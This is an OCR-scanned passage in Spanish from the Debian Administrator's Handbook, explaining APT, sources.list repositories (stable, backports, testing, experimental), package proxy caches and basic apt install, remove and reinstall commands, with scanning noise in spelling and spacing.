clusive  para  una  distribucion  derivada  como  Ubuntu,  probablemente  no  ofrezca  el 
mismo  nivel  de  calidad  e  integracion  que  un  paquete  desarrollado  especlficamente 
para  Debian  Jessie. 


$  fakeroot  alien  --to-deb  phpMyAdmin-2 . 0.5-2. noarch. rpm 

phpmyadmin_2 . 0 . 5-2_all .deb  generated 

$  Is  -s  phpmyadmin_2.0.5-2_all.deb 

64  phpmyadmin_2. 0.5-2  all. deb 

Encontrara  que  el  proceso  es  extremadamente  simple.  Debe  saber,  sin  embargo,  que  el  paque¬ 
te  generado  no  tiene  informacion  sobre  dependencias  ya  que  las  dependencias  de  los  dos  for- 
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matos  de  paquetes  no  tienen  una  correspondencia  sistematica.  El  administrador  debe,  por  lo 
tanto,  asegurarse  manualmente  que  el  paquete  convertido  funcionara  correctamente  y  esta  es 
la  razon  por  la  que  se  deben  evitar  los  paquetes  Debian  as!  generados  tanto  como  sea  posible. 
Afortunadamente,  Debian  tiene  la  coleccion  mas  grande  de  paquetes  de  software  entre  todas  las 
distribuciones  y  es  probable  que  lo  que  sea  que  busque  ya  este  alb. 

Revisando  la  pagina  de  manual  del  programa  alien  tambien  notara  que  este  programa  es  com¬ 
patible  con  otros  formatos  de  paquetes,  en  especial  el  utilizado  por  la  distribucion  Slackware 
(que  esta  compuesto  de  un  simple  compendio  tar.gz). 

La  estabilidad  del  software  desplegado  con  la  herramienta  dp  kg  contribuye  a  la  fama  de  Debian. 
La  suite  de  herramientas  APT  descrita  en  el  proximo  capitulo  preserva  esta  ventaja  al  mismo 
tiempo  que  liberan  al  administrador  de  la  carga  de  gestionar  el  estado  de  los  paquetes,  una  tarea 
diflcil  pero  necesaria. 
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Lo  que  hace  a  Debian  tan  popular  entre  administradores  es  lo  sencillo  que  resulta  instalar  software y  lo 
facil  que  se  puede  actualizar  el  sistema  completo.  Esta  ventaja  unica  es  en  gran  parte  debido  al  programa 
APT,  que  los  administradores  de  Falcot  Corp  estudiaron  con  entusiasmo. 


APT  son  las  siglas  de  «herramienta  avanzada  de  paquetes»  («Advanced  Package  Tool»).  Lo  que 
hace  este  programa  «avanzado»  es  su  enfoque  sobre  paquetes.  No  solo  los  evalua  individualmen- 
te  sino  que  los  considera  como  un  todo  y  produce  la  mejor  combinacion  posible  de  paquetes 
dependiendo  de  lo  que  este  disponible  y  sea  compatible  (segun  dependencias). 


VOCABULARIO  En  ingles  se  utiliza  la  misma  palabra  para  «origen»  y  «fuente»:  «source».  Por  lo 
Origen  del  paquete  y  tanto  es  sencillo  confundir  un  paquete  fuente  («source  package»)  que  contiene  el 

paquete  fuente  codigo  fuente  de  un  programa  con  un  «origen  de  paquetes»  («package  source»),  es 

decir:  un  repositorio  (sitio  web,  servidor  FTP,  CD-ROM,  directorio  local,  etc.)  que 
contiene  paquetes. 


Se  necesita  proveerle  a  APT  una  «lista  de  orfgenes  de  paquetes»:  el  archivo  /etc/apt/sources . 
list  contendra  una  lista  de  diferentes  repositorios  («sources»)  que  publican  paquetes  Debian. 
APT  importara  la  lista  de  paquetes  publicada  por  cada  una  de  estos  repositorios.  Realiza  esta  ope- 
racion  descargando  los  archivos  Packages  .  xz  (en  el  caso  de  paquetes  binarios)  o  una  variante 
que  utiliza  otro  metodo  de  compresion  (como  Packages  .gz  o  .  bz2)  y  archivos  Sources  .xz  o 
una  variante  (en  el  caso  de  un  origen  de  paquetes  fuente)  y  analizando  sus  contenidos.  Cuan- 
do  ya  posee  una  copia  antigua  de  estos  archivos,  APT  puede  actualizarla  solo  descargando  las 
diferencias  (revise  el  recuadro  «Actualizacion  incremental))  pagina  116). 


VOLVER  A  LOS  CIMIENTOS  La  extension  .  gz  hace  referencia  a  un  archivo  que  ha  sido  comprimido  con  la  uti- 

Compresion  gzip  bzip2  lidad  gzip.  gzip  es  la  utilidad  tradicional  Unix  rapida  y  eficiente  para  comprimir 

LZMA  y  XZ  archivos.  La  herramientas  mas  modernas  alcanzan  una  mayor  proporcion  de  com¬ 
presion  pero  precisan  de  mas  recursos  (tiempo  de  calculo  y  memoria)  para  compri¬ 
mir  y  descomprimir  un  archivo.  Ademas  de  estas,  y  por  orden  de  aparicion,  estan 
bzip2  (crea  archivos  con  extension  .bz2),  Izma  (crea  archivos  .lzma  )  y  xz  (crea 
archivos  .xz). 


6.1.  Contenido  del  archivo  sources. list 

6.1.1  Sintaxis 

Cada  linea  del  archivo  /etc/apt/sources  .  list  contiene  una  descripcion  de  un  origen,  com- 
puesta  por  3  partes  separadas  por  espacios. 

El  primer  campo  indica  el  tipo  de  origen: 

■  «deb»  para  paquetes  binarios, 

■  «deb-src»  para  paquetes  fuente. 

El  segundo  campo  provee  la  URL  base  para  el  origen  (combinado  con  los  nombres  de  archivo 
presentes  en  los  archivos  Packages  .gz  debe  generar  una  URL  completa  y  valida):  este  puede 
consistir  de  una  replica  Debian  o  en  cualquier  otro  compendio  de  paquetes  configurado  por  un 
tercero.  La  URL  puede  comenzar  con  file://  para  indicar  un  origen  local  instalado  en  lajerarquia 
de  archivos  del  sistema,  con  http://  para  indicar  un  origen  disponible  en  un  servidor  web  o  con 
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ftp://  para  un  origen  disponible  en  un  servidor  FTP.  La  URL  tambien  puede  comenzar  con  cdrom: 
para  instalaciones  desde  CD-ROM/DVD-ROM/Blu-ray,  aunque  esto  es  menos  frecuente  ya  que 
los  metodos  de  instalacion  desde  la  red  son  mas  y  mas  comunes. 

La  sintaxis  del  ultimo  campo  depende  de  la  estructura  del  repositorio.  En  los  casos  mas  simples, 
puede  indicar  un  subdirectorio  (con  la  barra  final  necesaria)  del  origen  deseado  (generalmente 
suele  ser  « .  /»  que  hace  referencia  a  la  ausencia  de  un  subdirectorio  —  los  paquetes  se  encuen- 
tran  directamente  en  la  URL  especificada).  Pero  en  el  caso  mas  comun,  los  repositories  tendran 
la  estructura  similar  a  una  replica  Debian,  con  varias  distribuciones  y  varios  componentes  en 
cada  una.  En  estos  casos,  utilice  la  distribucion  elegida  (por  su  «nombre  codigo»  —  revise  la  lista 
en  el  recuadro  «Bruce  Perens,  un  lider  polemico»  pagina  10  —  o  su  «suite»  correspondiente  — 
stable,  testing,  unstable)  y  luego  los  componentes  (o  secciones)  que  desea  activar  (en  un  reposi¬ 
torio  Debian  tipico:  main,  contrib  y  non-free). 


VOCABULARIO  Debian  utiliza  tres  secciones  para  diferenciar  los  paquetes  segun  las  licencias  se- 
Los  compendios  main  leccionadas  por  los  autores  de  cada  trabajo.  Main  reune  todos  los  paquetes  que 
contrib  y  non-free  cumplen  completamente  con  las  Directrices  de  software  libre  de  Debian. 

El  compendio  non-free  es  diferente  porque  contiene  software  que  no  sigue  (com¬ 
pletamente)  estos  principios  pero  que  aun  pueden  ser  distribuidos  sin  restricciones. 
Este  compendio,  que  no  es  parte  de  Debian  oficialmente,  es  un  servicio  para  los 
usuarios  que  pueden  llegar  a  necesitar  algunos  de  aquellos  programas  —  sin  em¬ 
bargo  Debian  siempre  recomienda  dar  prioridad  al  software  libre.  La  existencia  de 
esta  seccion  representa  un  problema  considerable  para  Richard  M.  Stallman  y  es  la 
razon  por  la  que  la  Free  Software  Foundation  no  recomienda  Debian  a  los  usuarios. 

Cont  rib  (contribuciones)  es  un  conjunto  de  software  de  codigo  abierto  que  no  pue¬ 
de  funcionar  sin  elementos  privativos.  Estos  elementos  pueden  ser  software  de  la 
seccion  non  -  f  ree  o  archivos  privativos  como  ROMs  de  juegos,  BIOS  para  consolas, 
etc.  Contrib  tambien  incluye  software  libre  cuya  compilacion  necesita  elementos 
privativos.  Inicialmente  este  era  el  caso  para  la  suite  de  oficina  OpenOffice.org  que 
necesitaba  un  entorno  Java  privativo. 


SUGERENCIA  Si  se  hace  referencia  a  muchos  orfgenes  de  paquetes  puede  ser  util  dividirlos  en 
Archivos  /etc/apt/  vari°s  archivos.  Cada  parte  se  almacena  en  /etc/apt/sou  rces  .  list .  d /nombre 
sources  list  d/*  list  d e  al~chivo  .  list  (ver  recuadro  «Directorios  terminados  con  .  d»  pagina  118). 


Los  elementos  cdrom  describen  los  CD/DVD-ROMs  que  posee.  A  diferencia  de  otros  elementos, 
un  CD-ROM  no  siempre  esta  disponible  ya  que  debe  encontrarse  en  el  dispositivo  y  solo  un  disco 
puede  leerse  en  un  momento  dado.  Por  estas  razones,  se  gestionan  estos  elementos  de  una  forma 
ligeramente  diferente  y  necesitan  ser  agregados  con  el  programa  a pt  -  cd  rom,  usualmente  ejecu- 
tado  con  el  parametro  add.  Este  programa  solicitara  que  introduzca  el  disco  en  el  dispositivo  y 
navegara  su  contenido  en  busca  de  archivos  Packages.  Utilizara  dichos  achivos  para  actualizar 
su  base  de  datos  de  paquetes  disponibles  (generalmente  realizada  cuando  ejecuta  apt  update). 
Desde  ese  momento  en  adelante,  APT  puede  solicitarle  introducir  el  disco  si  necesita  uno  de  sus 
paquetes. 
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6.1.2  Repositories  para  usuarios  de  Stable 


Este  es  un  archivo  sou  rces  .  list  estandar  para  un  sistema  que  ejecuta  la  version  Stable  de  De- 
bian: 


Ejemplo  6.1  el  archivo  / etc/ apt/ sources .  list  para  usuarios  de  Debian  «stable» 


#  Actualizaciones  de  seguridad 

deb  http://security.debian.org/  jessie/updates  main  contrib  non-free 
deb-src  http://security.debian.org/  jessie/updates  main  contrib  non-free 

##  Replica  debian 

#  Repositorio  base 

deb  http://ftp.debian.org/debian  jessie  main  contrib  non-free 
deb-src  http://ftp.debian.org/debian  jessie  main  contrib  non-free 

#  Actualizaciones  de  stable 

deb  http://ftp.debian.org/debian  jessie-updates  main  contrib  non-free 
deb-src  http://ftp.debian.org/debian  jessie-updates  main  contrib  non-free 

#  Ret roadaptaciones  para  stable 

deb  http://ftp.debian.org/debian  jessie-backports  main  contrib  non-free 
deb-src  http://ftp.debian.org/debian  jessie-backports  main  contrib  non-free 


Este  archivo  enumera  todos  los  orfgenes  de  paquetes  asociados  con  la  version  Jessie  de  Debian 
(la  version  Stable  cuando  esto  fue  escrito).  Decidimos  utilizar  «jessie»  explicitamente  en  lugar 
del  alias  «stable»  correspondiente  (stable,  stable-updates,  stable-backports)  ya  que  no  deseamos 
que  se  modifique  la  distribution  correspondiente  fuera  de  nuestro  control  cuando  se  publique 
la  siguiente  version  estable. 

La  mayoria  de  los  paquetes  provendran  del  «repositorio  base»  que  contiene  todos  los  paquetes 
pero  rara  vez  es  actualizado  (alrededor  de  una  vez  cada  2  meses  para  «versiones  menores»  — 
«point  release»).  Los  otros  repositories  son  parciales  (no  contienen  todos  los  paquetes)  y  pue- 
den  almacenar  actualizaciones  (paquetes  con  versiones  mas  recientes)  para  que  instale  APT.  Las 
secciones  siguientes  explicaran  su  proposito  y  las  reglas  que  regulan  cada  uno  de  estos  reposi¬ 
tories. 

Sepa  que  cuando  la  version  deseada  de  un  paquete  se  encuentra  disponible  en  varios  reposi¬ 
tories,  se  utilizara  el  que  se  encuentre  primero  en  el  archivo  sou  rces .  list.  Por  esta  razon, 
generalmente  se  agregan  orfgenes  no  oficiales  al  final  del  archivo. 

Como  nota  adicional,  la  mayoria  de  lo  que  diga  esta  seccion  sobre  Stable  tambien  es  aplicable  a 
Oldstable  ya  que  esta  ultima  es  solo  una  version  Stable  mas  antigua  que  se  mantiene  en  paralelo. 


108 


El  manual  del  Administrador  de  Debian 


Actualizaciones  de  seguridad 


Las  actualizaciones  de  seguridad  no  se  encuentran  en  la  red  de  replicas  de  Debian  usual  sino  en 
security.debian.org  (en  un  conjunto  pequeno  de  equipos  administrados  por  los  Administradores 
de  sistemas  de  Debian).  Este  compendio  contiene  las  actualizaciones  de  seguridad  (preparadas 
por  el  equipo  de  seguridad  de  Debian,  «Debian  Security  Team»,  y/o  por  los  encargados  de  los 
paquetes)  para  la  distribucion  Stable. 

El  servidor  tambien  puede  contener  actualizaciones  de  seguridad  para  Testing,  pero  esto  no  suce- 
de  frecuentemente  ya  que  dichas  actualizaciones  suelen  llegar  a  Testing  a  traves  del  flujo  normal 
de  actualizaciones  provenientes  de  Unstable. 


Actualizaciones  de  Stable 

Las  actualizaciones  de  stable  no  implican  riesgos  de  seguridad  pero  son  consideradas  suficiente- 
mente  importantes  como  para  ser  enviadas  a  los  usuarios  antes  de  la  publicacion  de  la  siguiente 
version  menor  de  stable. 

Este  repositorio  generalmente  incluira  correcciones  de  errores  criticos  que  no  pudieron  ser  ac- 
tualizados  antes  de  la  publicacion  o  que  fueron  introducidos  en  actualizaciones  posteriores.  De- 
pendiendo  de  la  urgencia,  tambien  puede  contener  actualizaciones  de  paquetes  que  evoluciona- 
ron  con  el  tiempo...  como  las  reglas  de  deteccion  de  spam  de  spamassassin,  la  base  de  datos  de 
virus  de  clamav  o  las  reglas  de  horarios  de  verano  de  todos  los  husos  horarios  (tzdata). 

En  la  practica,  este  repositorio  es  un  subconjunto  del  repositorio  proposed-updates,  selecciona- 
do  cuidadosamente  por  los  Gestores  de  la  version  estable  («Stable  Release  Managers»). 


Actualizaciones  propuestas 

Una  vez  publicada,  la  distribucion  Stable  se  actualiza  solo  una  vez  cada  2  meses.  El  repositorio 
proposed-updates  es  donde  se  preparan  las  futuras  actualizaciones  (bajo  la  supervision  de  los 
Gestores  de  la  version  estable,  «Stable  Release  Managers))). 

Las  actualizaciones  de  seguridad  y  de  estable  documentadas  en  las  secciones  anteriores  siempre 
son  parte  de  este  repositorio,  pero  tambien  habra  otras  ya  que  los  encargados  de  los  paquetes 
tambien  tienen  la  oportunidad  de  corregir  errores  importantes  que  no  justifican  que  se  publique 
una  nueva  version  inmediatamente. 

Cualquiera  puede  utilizar  este  repositorio  para  probar  esas  actualizaciones  antes  de  su  publica¬ 
cion  oficial.  El  extracto  a  continuacion  utiliza  el  alias  jessie-proposed-updates  que  es  mas  explici- 
to  y  mas  consistente  ya  que  tambien  existe  wheezy-proposed-updates  (para  las  actualizaciones 
de  Oldstable ): 

deb  http://ftp.debian.org/debian  jessie-proposed-updates  main  contrib  non-free 
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Retroadaptaciones  para  Stable 

El  repositorio  stable-backports  contiene  «retroadaptaciones  de  paquetes».  Es  termino  hace  re¬ 
ferenda  a  paquetes  de  software  reciente  que  fue  recompilado  para  una  distribucion  antigua, 
generalmente  para  Stable. 

Cuando  la  distribucion  entra  en  anos,  muchos  proyectos  de  software  habran  publicado  nuevas 
versiones  que  no  estan  integradas  en  la  version  actual  de  Stable  (que  solo  es  modificada  para 
corregir  los  problemas  mas  criticos,  como  los  problemas  de  seguridad).  Debido  a  que  las  distri- 
buciones  Testing  y  Unstable  son  mas  riesgosas,  los  encargados  de  paquetes  a  veces  ofrecen  re- 
compilaciones  de  aplicaciones  de  software  recientes  para  Stable  que  tienen  la  ventaja  de  limitar 
la  potencial  inestabilidad  a  un  numero  pequeno  de  paquetes  seleccionados. 

+  http://backports.debian.org 

El  repositorio  stable-backports  ahora  esta  disponible  en  las  replicas  Debian  usuales.  Pero  las 
retroadaptaciones  para  Squeeze  contimian  almacenadas  en  un  servidor  dedicado  (backports. deb 
ian.org)  y  necesitan  de  la  siguiente  lfnea  en  el  archivo  sou  rces  .  list: 

deb  http://backports.debian.org/debian-backports  squeeze-backports  main  contrib  non- 
**  free 

Siempre  se  crean  las  retroadaptaciones  de  stable-backports  de  los  paquetes  disponibles  en  Tes¬ 
ting.  Esto  asegura  que  todas  las  retroadaptaciones  instaladas  se  actualizaran  a  la  version  estable 
correspondiente  cuando  se  encuentre  disponible  la  siguiente  version  estable  de  Debian. 

Aun  cuando  este  repositorio  provea  versiones  de  paquetes  mas  nuevas,  APT  no  las  instalara  a 
menos  que  le  indique  explicitamente  que  lo  haga  (o  si  ya  lo  hizo  con  una  version  anterior  de 
dicha  retroadaptacion): 

$  sudo  apt-get  install  package/ jessie-backports 
$  sudo  apt-get  install  -t  jessie-backports  package 


6.1.3  Repositories  para  usuarios  de  Testing/ Unstable 

Este  es  un  archivo  sources  .list  estandar  para  un  sistema  que  ejecuta  la  version  Testing  o  Uns¬ 
table  de  Debian: 


Ejemplo  6.2  Archivo  sources,  list  para  usuarios  de  Debian  Testing/Unstable 


#  Unstable 

deb  http://ftp.debian.org/debian  unstable  main  contrib  non-free 
deb-src  http://ftp.debian.org/debian  unstable  main  contrib  non-free 

#  Testing 

deb  http://ftp.debian.org/debian  testing  main  contrib  non-free 
deb-src  http://ftp.debian.org/debian  testing  main  contrib  non-free 
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#  Stable 

deb  http://ftp.debian.org/debian  stable  main  contrib  non-free 
deb-src  http://ftp.debian.org/debian  stable  main  contrib  non-free 

#  Actualizaciones  de  seguridad 

deb  http://security.debian.org/  stable/updates  main  contrib  non-free 
deb  http://security.debian.org/  testing/updates  main  contrib  non-free 
deb-src  http://security.debian.org/  stable/updates  main  contrib  non-free 
deb-src  http://security.debian.org/  testing/updates  main  contrib  non-free 


Con  este  archivo  sou  rces .  list,  APT  instalara  paquetes  de  Unstable.  Si  esto  no  es  lo  que  desea, 
utilice  la  configuracion  APTuDefault-Release  (revise  la  Seccion  6.2.3,  «Actualizacion  del  siste- 
ma»  pagina  116)  para  indicarle  a  APT  que  utilice  los  paquetes  de  otra  distribucion  (en  este  caso 
probablemente  Testing). 

Existen  buenas  razones  para  incluir  todos  estos  repositories,  inclusive  cuando  solo  uno  deberfa 
ser  suficiente.  Los  usuarios  de  Testing  apreciaran  la  posibilidad  de  seleccionar  paquetes  especifi- 
cos  de  Unstable  cuando  la  version  en  Testing  posee  un  error  molesto.  Por  el  otro  lado,  los  usuarios 
de  Unstable  afectados  por  regresiones  inesperadas  pueden  desactualizar  paquetes  a  la  version  de 
Testing  (que  supuestamente  funciona). 

El  incluir  Stable  es  mas  discutible,  pero  generalmente  proveera  acceso  a  algunos  paquetes  que 
fueron  eliminados  de  las  versiones  en  desarrollo.  Tambien  asegura  que  obtendra  las  ultimas  ac¬ 
tualizaciones  para  paquetes  que  no  fueron  modificados  desde  la  publicacion  de  la  ultima  version 
estable. 


El  repositorio  Experimental 

El  compendio  de  paquetes  Experimental  se  encuentra  en  todas  las  replicas  Debian  y  contiene  pa¬ 
quetes  que  no  estan  en  Unstable  aun  debido  a  que  su  calidad  estabajo  los  estandares  normales  — 
generalmente  son  versiones  en  desarrollo  del  software  o  versiones  previas  (alpha,  beta,  candida¬ 
te  de  publicacion...).  Un  paquete  tambien  puede  ser  enviado  ahi  luego  de  sufrir  muchos  cambios 
que  pueden  generar  problemas.  El  desarrollador  luego  intentara  descubrirlos  con  la  ayuda  de 
usuarios  avanzados  que  pueden  manejar  problemas  importantes.  Luego  de  esta  etapa,  mueve  el 
paquete  a  Unstable,  donde  alcanza  una  audiencia  mas  grande  y  donde  sera  probado  en  mucho 
mas  detalle. 

Los  usuarios  que  usan  Experimental  generalmente  no  les  importa  romper  su  sistemay  luego  repa- 
rarlo.  Esta  distribucion  les  da  la  posibilidad  de  importar  un  paquete  que  el  usuario  desea  probar 
o  usar  segun  lo  necesita.  Esto  es  exactamente  el  enfoque  que  toma  Debian  ya  que  agregarlo  en  el 
archivo  sou  rces .  list  de  APT  no  conlleva  el  uso  sistematico  de  sus  paquetes.  La  linea  a  agregar 
es: 

deb  http://ftp.debian.org/debian  experimental  main  contrib  non-free 
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6.1.4  Recursos  no  oficiales:  mentors.debian.net 


Hay  multitud  de  fuentes  de  paquetes  de  Debian  no  oficiales  preparadas  por  usuarios  avanzados 
que  recompilan  algun  software  (Ubuntu  lo  hizo  popular  con  su  servicio  Archivos  de  Paquetes 
Personales,  PPA),  por  programadores  que  hacen  que  su  creacion  este  disponible  para  todos  e 
incluso  desarrolladores  de  Debian  que  ofrecen  versiones  previas  a  sus  paquetes  online. 

El  sitio  mentors.debian.net  es  interesante  ya  que  reune  los  paquetes  creados  por  los  candidates 
al  estado  de  desarrollador  Debian  oficial  o  por  voluntaries  que  desean  crear  paquetes  Debian 
sin  pasar  por  ese  proceso  de  integracion.  Los  paquetes  disponibles  aqul  no  tiene  garantfas  de 
calidad,  asegurese  de  revisar  su  origen  e  integridad  y  pruebelos  antes  de  considerar  utilizarlos 
en  produccion. 


COMUNIDAD  El  dominio  debian.net  no  es  un  recurso  oficial  del  proyecto  Debian.  Cada  desarrolla- 

Los  sitios  debian  net  dor  Debian  puede  utilizar  este  nombre  de  dominio  para  uso  propio.  Estos  sitios  web 

pueden  contener  servicios  no  oficiales  (a  veces  sitios  personales)  almacenados  en 
una  maquina  que  no  pertenece  al  proyecto  configurada  por  desarrolladores  Debian 
o  inclusive  prototipos  que  seran  movidos  a  debian.org.  Dos  razones  pueden  expli- 
car  porque  algunos  de  estos  prototipos  permanecen  en  debian.net.  o  bien  nadie 
realizo  el  esfuerzo  necesario  para  transformarlo  en  un  servicio  oficial  (en  el  domi¬ 
nio  debian.org  y  con  cierta  garantfa  de  mantenimiento)  o  el  servicio  es  demasiado 
controvertido  para  ser  oficializado. 


Instalar  un  paquete  significa  dar  permisos  de  root  a  su  creador,  porque  ellos  deciden  el  conte- 
nido  de  los  scripts  de  inicializacion  que  ejecutan  bajo  esa  identidad.  Los  paquetes  oficiales  de 
Debian  son  creados  por  voluntaries  que  fueron  cooptados  y  verificados  y  que  pueden  firmar  sus 
paquetes  para  que  se  pueda  revisar  su  origen  e  integridad. 

En  general,  desconfie  de  un  paquete  cuyo  origen  desconoce  y  que  no  es  almacenado  en  uno  de 
los  servidores  oficiales  de  Debian:  evaltie  el  grado  en  el  que  puede  confiar  en  su  creador  y  revise 
la  integridad  del  paquete. 

http : //mentors . debian . net/ 


YENDO  MAS  ALLA  El  servicio  snapshot,  debian. org,  introducido  en  Abril  de  2010,  para  «volver  en 
Versiones  antiguas  de  t'emP0>>  y  encontrar  una  version  anterior  de  un  paquete.  Puede  ser  utilizado, 
paquetes"  snapshot  debian  Por  ejempl°>  para  identificar  la  version  de  un  paquete  que  introdujo  una  regresion 
org  y,  mas  en  concreto,  volver  a  la  version  anterior  mientras  espera  que  corrijan  la 
regresion. 


6.1.5  Proxy  cache  para  paquetes  Debian 

Cuando  una  red  completa  de  equipos  esta  configurada  para  utilizar  el  mismo  servidor  remoto 
para  descargar  los  mismo  paquetes  actualizados,  todo  administrador  sabe  que  es  beneficioso 
tener  un  proxy  intermedio  que  funcione  como  cache  para  la  red  local  (revise  el  recuadro  «Cache» 

pagina  123). 
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Puede  configurar  APT  para  que  utilice  un  proxy  «estandar»  (revise  la  Seccion  6.2.4,  «Opciones 
de  configuracion»  pagina  117  para  la  configuracion  de  APT  y  la  Seccion  11.6,  «Proxy  HTTP/FTP» 
pagina  300  para  la  configuracion  del  proxy),  pero  el  ecosistema  Debian  ofrece  mejores  opciones 
para  solucionar  este  problema.  Esta  seccion  presente  un  software  dedicado  que  es  mas  inteli- 
gente  que  un  simple  proxy  cache  porque  utiliza  la  estructura  especifica  de  los  repositories  APT 
(por  ejemplo,  conoce  cuando  archivos  parti culares  son  obsoletos  o  no  y  asi  modifica  el  tiempo 
durante  el  cual  los  mantendra). 

apt-cacher  y  apt-cacher-ng  funcionan  como  servidores  proxy  cache  usuales.  No  se  modifica  el 
archivo  sou  rces  .  list,  pero  se  configura  a  APT  para  utilizarlos  como  proxy  para  pedidos  sa- 
lientes. 

approx,  por  el  otro  lado,  funciona  como  un  servidor  HTTP  que  «replica»  cualquier  cantidad  de 
repositorios  remotos  en  su  URL  mas  generica.  Se  almacena  el  mapeo  entre  estos  directories  y 
las  URLs  remotas  de  los  repositorios  en  /etc/approx/approx,  conf: 

#  <nombre>  <URL  base  del  repositorio> 
debian  http : //ftp . debian . org/debian 
security  http : //security . debian . org 


De  forma  predeterminada,  approx  ejecuta  en  el  puerto  9999  a  traves  de  inted  (revise  la  Sec¬ 
cion  9.6,  «El  superservidor  inetd»  pagina  217)  y  necesita  que  el  usuario  modifique  su  archivo 
sou  rces .  list  para  que  apunte  al  servidor  approx: 

#  Archivo  sources. list  de  ejemplo  que  apunta  a  un  servidor  approx  local 
deb  http : //apt . falcot . com: 9999/security  jessie/updates  main  contrib  non-free 
deb  http : //apt . falcot . com: 9999/debian  jessie  main  contrib  non-free 


6.2.  Los  programas  aptitude,  apt -get  y  apt 

APT  es  un  proyecto  gigante  y  su  plan  original  incluia  una  interfaz  grafica.  Esta  basado  en  una 
biblioteca  que  contiene  la  aplicacion  central  y  apt  -  get  fue  la  primera  interfaz  —  basada  en  la 
linea  de  ordenes  —  desarrollada  dentro  del  proyecto.  apt  es  un  segundo  frontend  de  linea  de 
comandos  proporcionado  por  APT  el  cual  soluciona  algunos  errores  de  diseno  de  la  orden  apt- 
get. 

Varias  otras  interfaces  graficas  aparecieron  luego  como  proyectos  externos:  synaptic,  apti 
tude  (que  incluye  tanto  una  interfaz  en  modo  texto  como  una  grafica  —  aun  cuando  no  este 
completa),  wa  j  ig,  etc.  La  interfaz  mas  recomendada,  apt  es  la  que  utilizaremos  en  los  ejemplos 
de  esta  seccion.  Note,  sin  embargo,  que  la  sintaxis  de  linea  de  ordenes  de  apt-get  y  de  aptit 
ude  son  muy  similares.  Detallaremos  cuando  existan  grandes  diferencias  entre  apt,  apt -get  y 
aptitude. 
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6.2.1  I  nicial  izacion 


Para  cualquier  trabajo  con  APT  necesita  actualizar  la  lista  de  paquetes;  puede  hacer 
esto  simplemente  con  apt  update.  Dependiendo  de  la  velocidad  de  su  conexion  es- 
ta  operacion  puede  demorar  ya  que  involucra  descargar  una  cantidad  de  archivos 
Packages/Sou rces/Translation -  codigo-idioma  que  han  crecido  gradualmente  a  medi- 
da  que  se  desarrollo  Debian  (mas  de  10  MB  de  datos  para  la  seccion  main).  Por  su  puesto, 
instalar  desde  un  CD-ROM  no  requiere  descarga  alguna  —  en  ese  caso  esta  operacion  es  muy 
rapida. 


6.2.2.  Instalacion  y  eliminacion 

Con  APT  puede  agregar  o  eliminar  paquetes  del  sistema,  con  apt  install  paquete  y  apt 
remove  paquete  respectivamente.  En  ambos  casos  APT  automaticamente  instalara  las  depen¬ 
dences  necesarias  o  eliminara  los  paquetes  que  dependen  del  paquete  que  esta  siendo  elimina- 
do.  La  orden  ap  pu  rge  paquete  realiza  una  desinstalacion  completa  —  se  eliminan  tambien  los 
archivos  de  configuracion. 


SUGERENCIA 

Instalando  la  misma 
selection  de  paquetes 
varias  veces 


Puede  ser  util  instalar  sistematicamente  la  misma  lista  de  paquetes  en  varios  equi- 
pos.  Esto  puede  realizarse  facilmente. 

Primero,  obtenga  la  lista  de  paquetes  en  el  equipo  que  servira  como  «modelo»  a 
copiar. 

$  dpkg  --get-selections  >pkg-list 


El  archivo  pkg-list  contiene  ahora  la  lista  de  paquetes  instalados.  Luego,  trans- 
fiera  el  archivo  pkg-  list  a  los  equipos  que  desee  actualizar,  y  utilice  los  siguientes 
comandos: 

##  Actualizar  la  base  de  datos  de  dpkg  sobre  paquetes 
*+■  conocidos 

#  avail='mktemp' 

#  apt-cache  dumpavail  >  "$avail" 

#  dpkg  --merge-avail  ”$avail" 

#  rm  -f  "$avail" 

##  Actualizar  estado  de  seleccion  de  paquetes  de  dpkg 

#  dpkg  --set-selections  <  pkg-list 

##  Pedirle  a  apt-get  que  instate  los  paquetes  seleccionados 

#  apt-get  dselect-upgrade 


La  primera  orden  graba  la  lista  de  paquetes  disponibles  en  la  base  de  datos  de 
dpkg,  despues  dpkg  - -set -selections  restaura  el  estado  de  los  paquetes  selec¬ 
cionados  que  desea  instalar  y  la  ejecucion  de  apt-get  implementa  las  operaciones 
requeridas.  aptitude  no  tiene  esta  orden. 
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SUGERENCIA  Es  posible  pedirle  a  apt  (o  apt -get,  o  aptitude)  que  instale  ciertos  paquetes  y 
Eliminando  e  instalando  elimine  otros  en  la  misma  linea  de  comando  agregando  un  sufijo.  Con  una  orden 
al  mismo  tiempo  aPt  insta VL,  agregue  «-»  a  los  nombres  de  paquetes  que  desee  eliminar.  Con  una 
orden  apt  remove,  agregue  «+»  a  los  nombres  de  paquete  que  desee  instalar. 

El  siguiente  ejemplo  muetra  dos  formas  distintas  de  instalar  paquetel  y  eliminar 
paquete2. 

#  apt  install  paquetel  paquete2- 

[...] 

#  apt  remove  paquetel+  paquete2 

[...] 

De  esta  forma  tambien  puede  excluir  paquetes  que  se  instalarian,  por  ejemplo  de- 
bido  a  una  recomendacion  (Recommends).  Generalmente,  el  sistema  de  resolucion 
de  dependencias  utilizara  esa  informacion  como  una  indicacion  para  encontrar  so- 
luciones  alternativas. 


SUGERENCIA  A  veces  el  sistema  puede  danarse  despues  de  eliminar  o  modificar  los  archivos  de 
apt  --reinstall  y  un  Pat)ueto-  La  forma  mas  sencilla  de  recuperar  estos  archivos  es  reinstalar  los 
aptitude  reinstall  paquetes  afectados.  Desafortunadamente,  el  sistema  de  empaquetado  encuentra 
que  este  ya  esta  instalado  y  amablemente  rechaza  su  reinstalacion;  Para  evitarlo, 
utilice  la  opcion  -  -  reinstall  de  los  comandos  apt  y  apt-get.  La  siguiente  orden 
reinstala  postfix  aunque  ya  este  instalado: 

#  apt  --reinstall  install  postfix 

La  linea  de  ordenes  para  aptitude  es  ligeramente  diferente  pero  consigue  el  mismo 
resultado  con  aptitude  reinstall  postfix. 

El  problema  no  ocurre  con  dpkg  pero  el  administrador  rara  vez  lo  utiliza  directa- 
mente. 

jTenga  cuidado!  El  uso  de  apt  -  -  reinstall  para  restaurar  paquetes  modificados 
durante  un  ataque  no  recuperara  el  sistema  tal  y  como  estaba.  La  Seccion  14.7,  «Tra- 
tamiento  de  una  maquina  comprometida»  pagina  438  detalla  los  pasos  necesarios 
para  recuperar  en  un  sistema  comprometido. 


Si  el  archivo  sources,  list  menciona  varias  distribuciones,  es  posible  indicar  la  version  del 
paquete  a  instalar.  Se  puede  proporionar  un  numero  de  version  especifico  con  apt  install 
paquete=version,  pero  generealmente  es  preferible  indicar  la  distribucion  de  origen  ( Stable , 
